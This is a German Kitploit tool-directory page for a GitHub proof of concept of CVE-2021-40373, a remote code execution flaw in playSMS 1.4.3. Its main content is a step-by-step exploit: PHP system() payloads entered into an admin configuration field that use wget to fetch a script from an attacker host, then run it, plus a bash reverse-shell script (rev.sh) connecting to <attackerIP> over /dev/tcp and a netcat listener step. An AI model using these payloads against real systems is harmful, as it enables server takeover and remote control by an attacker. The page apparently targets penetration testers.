Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-40373 — CVE-2021-40373 - Remotecodeausführung | Kitploit
Tools/GitHubGitHub/maikroservice/cve-2021-40373
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubmaikroservice/cve-2021-40373

CVE-2021-40373

CVE-2021-40373 - Remotecodeausführung

Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-playsms

Es gibt eine Schwachstelle in playsms 1.4.3, die es potenziellen Angreifern ermöglicht, Remote-Code-Ausführung durchzuführen.

So reproduzierst du RCE (Shell):

https://playsms.org/

  • docker pull playsms/playsms:1.4.3
  • docker run -d -p 80:80 playsms/playsms
  • melde dich mit admin:admin an
  • http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • stelle eine schadhafte Bash-Datei auf dem Angreifer-Rechner bereit
  • lade die schadhafte Datei mit wget auf dem Rechner herunter
  • gib <?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?> ein
  • speichere die Informationen (sie werden aus dem Eingabefeld verschwinden, funktionieren aber weiterhin)
  • http://127.0.0.1/index.php?app=main&inc=core_welcome
  • lade die Seite neu: http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • führe chmod +x aus und starte dann das Shell-Skript - <?php system("chmod +x rev.sh && ./rev.sh") ?>)
  • speichere und besuche * http://127.0.0.1/index.php?app=main&inc=core_welcome, um Code-Ausführung zu erhalten
  • starte einen lokalen Netcat-Handler, um die Remote-Shell abzufangen

rev.sh

root@kitploit:~
#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"
Tool herunterladen